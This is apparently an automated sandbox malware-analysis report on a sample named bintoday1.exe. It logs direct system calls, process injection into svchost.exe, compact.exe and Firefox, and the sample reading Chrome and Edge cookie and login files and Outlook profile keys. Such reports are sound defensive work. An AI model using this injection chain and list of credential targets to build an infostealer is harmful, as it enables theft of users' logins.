Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe NtClose: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\bintoday1.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Thread register set: target process: 6468 Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Thread APC queued: target process: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 363008 Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00BF1201
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BD2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00BD2BA5
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BFB226 SendInput,keybd_event, 0_2_00BFB226
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00C122DA
Source: C:\Users\user\Desktop\bintoday1.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bintoday1.exe" Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe" Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00BF0B62
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BF1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00BF1663
Source: bintoday1.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: bintoday1.exe, eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: eypfpUNFpbLX.exe, 00000006.00000000.2369823566.0000000001141000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000006.00000002.4022391575.0000000001140000.00000002.00000001.00040000.00000000.sdmp, eypfpUNFpbLX.exe, 00000009.00000002.4023500202.0000000001140000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BB0698 cpuid 0_2_00BB0698
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C08195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00C08195
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BED27A GetUserNameW, 0_2_00BED27A
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00BCB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_00BCB952
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00B942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00B942DE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: bintoday1.exe Binary or memory string: WIN_81
Source: bintoday1.exe Binary or memory string: WIN_XP
Source: bintoday1.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: bintoday1.exe Binary or memory string: WIN_XPe
Source: bintoday1.exe Binary or memory string: WIN_VISTA
Source: bintoday1.exe Binary or memory string: WIN_7
Source: bintoday1.exe Binary or memory string: WIN_8

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2460538181.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4010508609.00000000004D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4023622986.00000000009D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4022626506.0000000000980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2460077708.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.4026387029.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2461015937.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4023857362.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C11204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00C11204
Source: C:\Users\user\Desktop\bintoday1.exe Code function: 0_2_00C11806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00C11806
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs